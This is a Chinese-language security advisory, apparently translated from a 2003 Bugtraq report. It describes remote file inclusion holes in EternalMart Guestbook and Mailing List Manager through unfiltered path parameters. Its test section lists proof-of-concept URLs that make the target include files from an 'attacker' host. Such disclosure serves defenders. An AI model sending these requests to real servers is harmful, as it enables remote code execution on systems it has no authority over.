安全研究
安全漏洞
EternalMart多个文件包含漏洞
发布日期:2003-10-04
更新日期:2003-10-14
受影响系统:EternalMart Guestbook 1.1
EternalMart Mailing List Manager 1.32
描述:
BUGTRAQ ID:
8767
EternalMart包含邮件列表管理和客户留言本系统。
EternalMart没有正确处理用户提交的请求,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。
EternalMart邮件管理程序对用户提交的$emml_path变量缺少充分过滤,可导致远程攻击者提交恶意数据给$emml_path,包含攻击者指定的远程服务器上文件,以WEB权限在系统内执行任意PHP代码。
另外EternalMart客户留言系统上对$emgb_admin_path变量也缺少过滤,同样存在上述问题。
<*来源:Frog Man (
leseulfrog@hotmail.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=106529524431712&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Frog Man (
leseulfrog@hotmail.com)提供了如下测试方法:
EMML :
- http://[target]/admin/auth.php?emml_admin_path=http://[attacker] will
include the file :
http://[attacker]/auth_func.php
- http://[target]/emml_email_func.php?emml_path=http://[attacker] will
include the file :
http://[attacker]/class.html.mime.mail.php
EMGB :
- http://[target]/admin/auth.php?emgb_admin_path=http://[attacker] will
include the file :
http://[attacker]/auth_func.php
建议:
厂商补丁:
EternalMart
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.eternalmart.com浏览次数:2939
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |